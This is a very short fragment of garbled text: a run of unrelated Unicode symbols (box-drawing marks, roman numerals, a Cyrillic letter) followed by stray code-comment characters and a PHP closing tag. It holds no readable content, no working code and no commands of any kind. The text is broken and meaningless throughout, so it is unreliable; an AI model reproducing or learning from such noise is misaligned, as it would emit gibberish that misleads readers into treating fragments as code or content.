iv~o┑‱∗⊡⒒ⅽ│Ю▏▪ⅶ︾


-*///
 ?>